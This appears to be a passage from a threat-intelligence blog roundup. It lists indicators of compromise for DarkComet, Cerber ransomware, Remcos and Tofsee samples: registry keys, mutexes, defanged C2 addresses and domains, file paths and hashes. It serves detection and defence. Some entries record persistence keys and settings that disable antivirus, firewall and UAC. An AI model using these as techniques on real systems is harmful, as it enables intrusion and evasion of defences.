AMP\n\n[](<https://1.bp.blogspot.com/-MtRhgx6TyoY/XdgTbaoPyeI/AAAAAAAAC60/qk40gWnPJ0Mpojdx8RMats0t2koWDMnJgCLcBGAsYHQ/s1600/148a31211653eb50a050446b5556cf02846f957e210725c56cde63b8196384e5_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.DarkComet-7395004-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\DC3_FEXEC ` | 13 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: UserInit ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Driver ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: RealtekHD ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: MicroUpdate ` | 2 \nMutexes | Occurrences \n---|--- \n`DC_MUTEX-RL28VNV` | 3 \n`DCMUTEX` | 1 \n`DC_MUTEX-JG8JLJL` | 1 \n`DC_MUTEX-M79BVMN` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`lolmands[.]chickenkiller[.]com` | 4 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\MSDCSC` | 7 \n`%APPDATA%\\MSDCSC\\driver` | 7 \n`%APPDATA%\\dclogs` | 4 \n`%ProgramData%\\Microsoft\\Windows\\Start Menu\\MSDCSC` | 3 \n`%ProgramData%\\Microsoft\\Windows\\Start Menu\\MSDCSC\\RealtekHD.exe` | 3 \n`\\Documents and Settings\\All Users\\Start Menu\\MSDCSC\\RealtekHD.exe` | 3 \n`%HOMEPATH%\\My Documents\\MSDCSC\\msdcsc.exe` | 2 \n`%HOMEPATH%\\Documents\\MSDCSC` | 2 \n`%HOMEPATH%\\Documents\\MSDCSC\\msdcsc.exe` | 2 \n`%TEMP%\\RESIM 1.PNG` | 1 \n`%TEMP%\\~PI26.tmp` | 1 \n`%TEMP%\\~PI85.tmp` | 1 \n \n#### File Hashes\n\n` 0316a484966a555a7e369cf49423da28c7cba45bb38d031386ad1e98c7730ed0 30d81a3c924535f64ebb60ffb7c96df278144ec422ea2f7b1905790d2c876619 3a44d9ae2b5508869df06bbf3dc0750f8e4cd8a7a827c95cd24f98966bbbfa38 48d15953b1c2f1e314a6ae3945ccbfd9b3e0fe2d40eea09c8d5f379b07f70866 5027bea06d7037f478ddcfd932cc82f682612e147f00d34d47cbf644453b74df 6289734ecf82dc9496402d9ceae7308819c4bbbb5d85642e8dc5108e8a08c32f 65e95281868c80b645d0276515b8b54fab52fe031a85b96c3e1d29148546bcb4 6c6483db05cbc3e863e3231405f66bc764930e5348800780d50bd1ccf1f869c4 74d2e08ab92859332efc3f97c0ef872979820527cc994c3d4160dd2da4add8e7 a44d66aebc02d8d612038c33bd397bf64097da98676b49315c74b79dd449b142 a7c7b756104d1a98a9daa80a7a591dab8cd210be1cf4a187363e42c23abc5856 be324c43b4b0a4f607e60db1926f4eca349fbb2fb6250da3337f7e94d1ea66c8 f43789df8769817412591e561390f06f9ae94b8047b0afd5b5c74170109729e8 f93f80520ccbba8fa35deb75f50ceba2f54b1ef52589b0c072248786bcef78b0 fa45ff72c498d1af84a96317ecb71a96bd608799d529ae8334d83928dff7b970 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-jBGicerbZyY/XdgT-NyQt3I/AAAAAAAAC68/yDQuF9Lf-UMvFXrQBLWVQWqQAxVoiwGWQCLcBGAsYHQ/s1600/30d81a3c924535f64ebb60ffb7c96df278144ec422ea2f7b1905790d2c876619_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Cerber-7395321-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER \nValue Name: PendingFileRenameOperations ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: api-PQEC ` | 5 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 ` | 5 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {F50EA47E-D053-EF14-82F9-0493D63D7877} ` | 3 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954} ` | 3 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Client ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusOverride ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusDisableNotify ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallDisableNotify ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallOverride ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesDisableNotify ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UacDisableNotify ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: EnableFirewall ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DoNotAllowExceptions ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DisableNotifications ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION \nValue Name: jfghdug_ooetvtgk ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: JudCsgdy ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Userinit ` | 2 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 16 \n`shell.{<random GUID>}` | 11 \n`{<random GUID>}` | 5 \n`Local\\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}` | 3 \n`Local\\{7FD07DA6-D223-0971-D423-264D4807BAD1}` | 3 \n`Local\\{B1443895-5CF6-0B1E-EE75-506F02798413}` | 3 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`178[.]128[.]255[.]179` | 16 \n`178[.]33[.]158[.]0/27` | 16 \n`178[.]33[.]159[.]0/27` | 16 \n`178[.]33[.]160[.]0/25` | 16 \n`104[.]24[.]104[.]254` | 13 \n`104[.]24[.]105[.]254` | 11 \n`34[.]206[.]50[.]228` | 8 \n`54[.]164[.]0[.]55` | 6 \n`208[.]67[.]222[.]222` | 3 \n`172[.]217[.]7[.]206` | 2 \n`86[.]105[.]1[.]11` | 2 \n`172[.]217[.]11[.]46` | 1 \n`46[.]165[.]221[.]154` | 1 \n`91[.]195[.]240[.]13` | 1 \n`195[.]201[.]179[.]207` | 1 \n`192[.]3[.]8[.]218` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]blockcypher[.]com` | 16 \n`bitaps[.]com` | 16 \n`chain[.]so` | 16 \n`btc[.]blockr[.]io` | 16 \n`bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com` | 11 \n`resolver1[.]opendns[.]com` | 3 \n`222[.]222[.]67[.]208[.]in-addr[.]arpa` | 3 \n`myip[.]opendns[.]com` | 3 \n`wdwefwefwwfewdefewfwefw[.]onion` | 2 \n`ahrkvtgc[.]com` | 1 \n`fhvkufnnrlyfvx[.]com` | 1 \n`shebkucvrunporc[.]com` | 1 \n`hd63ueor8473y[.]com` | 1 \n`qegdtnvuanlyid[.]com` | 1 \n`gcijrxipe[.]com` | 1 \n`ogltynjmtfiu[.]com` | 1 \n`rlkeqcsygmmglv[.]com` | 1 \n`wglxvkpybhnxhfv[.]com` | 1 \n`aynycxbgodmwi[.]com` | 1 \n`uahvwkjphhklqigod[.]com` | 1 \n`en[.]voltster12v[.]com` | 1 \n`cloud[.]pathwaystopromise[.]info` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\d19ab989` | 16 \n`%TEMP%\\d19ab989\\4710.tmp` | 16 \n`%TEMP%\\d19ab989\\a35f.tmp` | 16 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.tmp` | 16 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.bmp` | 16 \n`<dir>\\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.txt` | 16 \n`<dir>\\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.hta` | 16 \n`<dir>\\<random, matching [A-Z0-9\\-]{10}.[A-F0-9]{4}> (copy)` | 11 \n \n#### File Hashes\n\n` 00fd6d5030b6f36f2acef17f933bf87a5e83104e86edc18467318362fe41bda0 0db052f343bb2c323603fd34eea55262f5448450feaf0dbb03e77da1d1da204e 1beb4d8646023322d8eefba6bee5d899f375bd099050367e8af5321eda512db5 1e78866a82b6016b280f4935ab6aa8e6d59456c5fdb4900ef456cb6216fba878 2766aa41ce912acac61bc342873b1d016c016780600846b77ccee98eaea0a0c1 316c4f6ce0478622772c16aa1821297569a27d52a8ab65262bc1702e864d3cff 367afe107f332d7fd9676b75a76624a2378758104316278a28984ba1815073b2 36bee89b83bc3b628abb726b4530a7fda8b86448594543532ec303f659cd1c1d 36f70b90e9ef4c34440e13c064d05dc0996debd74a7361109532bfda65108ab6 382d8c432cf11339a41b6c0371a226b7567620c6440b0ebdf7dc1610db4ec3c4 38bc3877ec4f87307ccb3d23dc7ea58b117fccfa1ccba938fa9dcff4bb956fe2 4a2803f8ddf258eb4d41ff15f617307cc6eda54bd4e635b0314c9706cff9007e 4b9c203a3f4a7129d0701c5f3e8266d217c836b497c7acf762ad7f8eab508349 4bf2851749232054a7f08faa294520d3bf372b84eb5d20707add176acb1e9aa6 54852be80e90db1d2550128bdf82028befcdf1340da2a1add061e7f6027eb272 552a32a57b59b7498a79f187d2cbfdf7c797395024392b7f76d7b1fff94fea8b 576a3ddc924aea581818f397bca1fe1a3788f892d81b8a2287c03566bc7e6242 5d2e3adf40ec1ae0f6032213a8bb27be9eaf5ae99a6f09239088e8c47944ed02 7275da6b777a1c5c9392766d7fec3c4f0b07e93af161d11b7da000e6157178b0 73796be2c91ffba6b1981860fdc79f7862bbe4b5dd890a42f3d1f8cd38530001 7420f8c4f266ebd29b867ef980309bfe8a1d8845f7683e6f8db734c5812eb5e8 89fc2e256c70fb0235ebb0a9daa3f096ba7722fd06b7b0866a1e87b1ea003f79 a04e9bf2aed6eef853c5a5f2ce6131963cb7cd15971c02e6f2afa18846737e74 a508a738cc8d633613641680ca3a7df98be4fa3d6b8f28a16904ba7aa600b89c ad4a8230c0a8d5deb3d8253ef0e2a9c41531eb1560e538ef8cb1a5ff56e7cb27 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-gpxC0L9pe_I/XdgZwRwyC-I/AAAAAAAAC7k/OcpcZwodBgQcxqeiDUdrXHh72ZnvXUZVgCLcBGAsYHQ/s1600/73796be2c91ffba6b1981860fdc79f7862bbe4b5dd890a42f3d1f8cd38530001_amp.png>)\n\n \n\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-ARF_WT0-Mlw/XdgZ1jhkeDI/AAAAAAAAC7o/jxa_5xAENAoebgaF25kMQRg6n-QCBSgSQCLcBGAsYHQ/s1600/73796be2c91ffba6b1981860fdc79f7862bbe4b5dd890a42f3d1f8cd38530001_umbrella.png>)\n\n \n\n\n \n\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-otI_RS-9_zo/XdgZ61uz6XI/AAAAAAAAC7s/TZ-WFRzqNa0JafWIdy5Jjm0DFZ7DS67RACLcBGAsYHQ/s1600/a508a738cc8d633613641680ca3a7df98be4fa3d6b8f28a16904ba7aa600b89c_malware.png>)\n\n \n\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Remcos-7395733-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\LOCAL APPWIZARD-GENERATED APPLICATIONS ` | 24 \n`<HKCU>\\SOFTWARE\\LOCAL APPWIZARD-GENERATED APPLICATIONS\\MYIMGAPP ` | 24 \n`<HKCU>\\SOFTWARE\\LOCAL APPWIZARD-GENERATED APPLICATIONS\\MYIMGAPP\\RECENT FILE LIST ` | 24 \n`<HKCU>\\SOFTWARE\\LOCAL APPWIZARD-GENERATED APPLICATIONS\\MYIMGAPP\\SETTINGS ` | 24 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Snk ` | 19 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Snk ` | 19 \n`<HKCU>\\SOFTWARE\\XLR4615DFT-CRBSFT \nValue Name: exepath ` | 19 \n`<HKCU>\\SOFTWARE\\XLR4615DFT-CRBSFT \nValue Name: licence ` | 19 \n`<HKCU>\\SOFTWARE\\XLR4615DFT-CRBSFT ` | 19 \n`<HKCU>\\SOFTWARE\\NETWIRE ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: MServices ` | 1 \n`<HKCU>\\SOFTWARE\\NETWIRE \nValue Name: HostId ` | 1 \n`<HKCU>\\SOFTWARE\\NETWIRE \nValue Name: Install Date ` | 1 \nMutexes | Occurrences \n---|--- \n`Remcos_Mutex_Inj` | 19 \n`XLR4615DFT-CRBSFT` | 19 \n`IMYGdLWM` | 1 \n`Global\\00430b21-08fc-11ea-a007-00501e3ae7b5` | 1 \n`Global\\006bff81-08fc-11ea-a007-00501e3ae7b5` | 1 \n`Global\\03cef101-08fc-11ea-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`186[.]170[.]64[.]85` | 17 \n`186[.]170[.]70[.]152` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`proyectobasevirtualcol[.]com` | 19 \n`recuperaciondecartera[.]website` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\install.vbs` | 19 \n`%APPDATA%\\System32` | 19 \n`%APPDATA%\\System32\\Snk.exe` | 19 \n`%APPDATA%\\Runtime3` | 19 \n`%APPDATA%\\Runtime3\\1627.dat` | 19 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 15 \n`%TEMP%\\8D6B.dmp` | 1 \n`%TEMP%\\8adb_appcompat.txt` | 1 \n`%APPDATA%\\Install` | 1 \n`%APPDATA%\\Install\\MServicesNet.exe` | 1 \n \n#### File Hashes\n\n` 01c3ab58c66605c68709c785147dc5be803235222cdbcf535e03ad312a2475bf 04ee0252ab6db7de6c8b774254265037413a9979ac9c492918ea66b45acedf5c 0ab93b4561aefbb2dbaccfcb8dc2a000ba14c10ca1bf8222da5125b948e5116f 1c6a3d4989760e577e07a238dfc81f511c23d1cc1840418af3fb01264cc8a54c 2ac0166d713688697266de2427af824786fd76d5f110e758108f1ae3a7eb6037 48097d2e7e7bb93c4319223a1829239031a1ebbb641a42dcee1b82ada6f8a179 482a3fe73c9fed841695232330c1316472f6f134a6ae65e1f7da61aea4a246bf 70c958e641eee241550a356c0bf81856e3087757471903ee26bb4751d900249d 72cbc8432180fdc6f242e3ce62b80e269d6ead62df1c054e475690c89e3de560 740f6504c165641c9460c853855a586bab05a92ef6d4d4f0435465ea000840b8 7b067dfdd9a77f27b8b16237027c7d159760fb7bbd7effc3663d1d883a50c086 7f5c18605851bc58ef1eba832d3c16f89492ddaeacabee5fa4ad5c8f7402e4bc 843aa842d5d0a8975e8320318960bac3c5356e6e13be3918358e6cb81395e410 8ddc6f9e1435f94e7f8d6aac4cceb7b751b4a70b7e9c11bc46ce81c2fc1efcf5 9808a934240773b0a1cd470d1d87c9f8f54f54bde5801ceae3113677e9378f52 baabcbcd2c97382f2ca9b5786d21f6ed781f5d91cbea916618c0c7aebfcb90b2 bf8938bb97fc959dfaa4fc13d1ca43106e3c0524a626d5778ff7d5d987d9f90e c157967fafed0df923bfa887e443562d13e159eeb0391aa0e4243ec833aacce3 ca2c6609831dc62ed1560aa03b949a897203e62f3dcad833e6abebde6f15232d d643273166b2e97bd4dff80e0f351404f14f2523d713e2f5691e530d94515327 d91f5a063d69697c887a8f0c495c88d699e118fe3367e1b22eb7cf2fcdcabbbe d96399e30a6ae180e5c138453d7c74129e08ab40fa158cf85e0cf7663ed873dc fbb1fed1b420443abadd4d7d091fd448c85a64d2cf8521aa4152277b7821bf0a fc7f4839fea7be50cdb46251be9dbcc6f974232c8eb0e97f2959d99c629f197f `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-kASeedqs8rY/XdgaMaN8DNI/AAAAAAAAC74/uu6qJ0X-lT01-0WmXyw6YJFeMtZf21lxQCLcBGAsYHQ/s1600/fc7f4839fea7be50cdb46251be9dbcc6f974232c8eb0e97f2959d99c629f197f_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Tofsee-7402230-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 3 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 3 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 3 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 3 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\ibpvucix ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IBPVUCIX \nValue Name: Type ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IBPVUCIX \nValue Name: Start ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IBPVUCIX \nValue Name: ErrorControl ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IBPVUCIX \nValue Name: DisplayName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IBPVUCIX \nValue Name: WOW64 ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IBPVUCIX \nValue Name: ObjectName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IBPVUCIX \nValue Name: Description ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\exlrqyet ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\nguazhnc ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\EXLRQYET \nValue Name: Type ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\EXLRQYET \nValue Name: Start ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\EXLRQYET \nValue Name: ErrorControl ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\EXLRQYET \nValue Name: DisplayName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\EXLRQYET \nValue Name: WOW64 ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\EXLRQYET \nValue Name: ObjectName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\EXLRQYET \nValue Name: Description ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\NGUAZHNC \nValue Name: Type ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\NGUAZHNC \nValue Name: Start ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\NGUAZHNC \nValue Name: ErrorControl ` | 1 \nMutexes | Occurrences \n---|--- \n`{37529D08-A67E-40B3-B0F2-EB87331B47F5}` | 9 \n`Global\\<random guid>` | 7 \n`A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A` | 1 \n`A238FB802-231ABE6B-F2351354-74D8EB40-AEDEC6C4` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`239[.]255[.]255[.]250` | 3 \n`69[.]55[.]5[.]250` | 3 \n`216[.]239[.]36[.]21` | 3 \n`172[.]217[.]12[.]196` | 3 \n`104[.]47[.]2[.]33` | 3 \n`46[.]4[.]52[.]109` | 3 \n`43[.]231[.]4[.]7` | 3 \n`213[.]209[.]1[.]129` | 3 \n`104[.]47[.]1[.]33` | 3 \n`192[.]0[.]47[.]59` | 3 \n`194[.]25[.]134[.]8` | 3 \n`144[.]160[.]235[.]143` | 3 \n`216[.]40[.]42[.]4` | 3 \n`188[.]125[.]72[.]73` | 3 \n`85[.]114[.]134[.]88` | 3 \n`46[.]28[.]66[.]2` | 3 \n`78[.]31[.]67[.]23` | 3 \n`188[.]165[.]238[.]150` | 3 \n`93[.]179[.]69[.]109` | 3 \n`176[.]9[.]114[.]177` | 3 \n`104[.]47[.]45[.]33` | 2 \n`47[.]43[.]18[.]9` | 2 \n`31[.]13[.]65[.]174` | 2 \n`192[.]36[.]171[.]203` | 2 \n`54[.]184[.]154[.]83` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 3 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 3 \n`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 3 \n`mta5[.]am0[.]yahoodns[.]net` | 3 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 3 \n`t-online[.]de` | 3 \n`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 3 \n`smtp-in[.]libero[.]it` | 3 \n`whois[.]iana[.]org` | 3 \n`libero[.]it` | 3 \n`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 3 \n`yahoo[.]co[.]uk` | 3 \n`whois[.]arin[.]net` | 3 \n`eur[.]olc[.]protection[.]outlook[.]com` | 3 \n`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 3 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 3 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 3 \n`al-ip4-mx-vip1[.]prodigy[.]net` | 3 \n`mx00[.]t-online[.]de` | 3 \n`msa[.]hinet[.]net` | 3 \n`msa-smtp-mx1[.]hinet[.]net` | 3 \n`irina94[.]rusgirls[.]cn` | 3 \n`anastasiasweety[.]rugirls[.]cn` | 3 \n`beautyrus[.]cn` | 3 \n`ipinfo[.]io` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 13 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 13 \n`%System32%\\Tasks\\Intel Rapid` | 9 \n`%APPDATA%\\Intel Rapid` | 9 \n`%APPDATA%\\Intel Rapid\\IntelRapid.exe` | 9 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\IntelRapid.lnk` | 9 \n`%HOMEPATH%\\Start Menu\\Programs\\Startup\\IntelRapid.lnk` | 7 \n`%TEMP%\\CC4F.tmp` | 7 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 3 \n`%APPDATA%\\Microsoft\\Crypto\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Document Building Blocks\\1033\\14\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Document Building Blocks\\1033\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Document Building Blocks\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Excel\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\HTML Help\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Internet Explorer\\Quick Launch\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Internet Explorer\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\MMC\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Office\\Recent\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Office\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Outlook\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\PowerPoint\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Proof\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Protect\\RyukReadMe.html` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 4a893b16147c2cd5df11b1f4df08eddc5505f0aafa9f58747ad0f89d53e65492 4b667f73da0fd2cf8b54efa73239e377c10111fd00e08b9ddaa2adee2a873576 4ee405168c9283d73e2ee5913b2c817b824c02e62b8af2750865dc9a6b7e1f4a 75504fa32f3c2e6c56120a26f6af451dc0c688cf1a1dcfe3f656152326ac3584 7acf0435afa75bdc00575208f16f21c0dec8c101fbcefe96836af71c4c628158 8909eeaeb9edc9b01bfae72a64e84b4589c1d2161debee40dd2ab5f5f0ec3858 89678ea136df0b80c0bd0620836624ff785540801ca1f5beec5e7ee76755b684 981a0821cf4b4992d07b5d74ec24a490f4dee396f8e05d66e85cf87809676fe6 9cf0bfd67b4f99bf1ba21175ef3803b18dc774772187b6eb0e610cdacf759cad b8068519f39fb924188bb343eead3b327604a5a09dd3f51fe2486b90b85ac17b bc720a574efb5d1a1a14489ca4d970cfe9d430f6001c2be09e4dc53d2c80b5cb c03e1affd3cb95c110e931d5571cd5d6c8464af36ca1ce1a0114cd9c1eeedb21 d0b333bb1d8c6c153f91a3a5116a1f989c7759dc31f09008288aa720c65371b8 d0c67d3e0edfe1e0d835dbe5d6676c906c418877500b60044f91305d8b4b43ca da58160abd6e306350ecb6647095970ea0dcbcddc1a5b6671b8575885482a824 dd684a06a5d8f00f3e2efb903898d5311d844eb460b7a6a2531f05c69ac56cbe 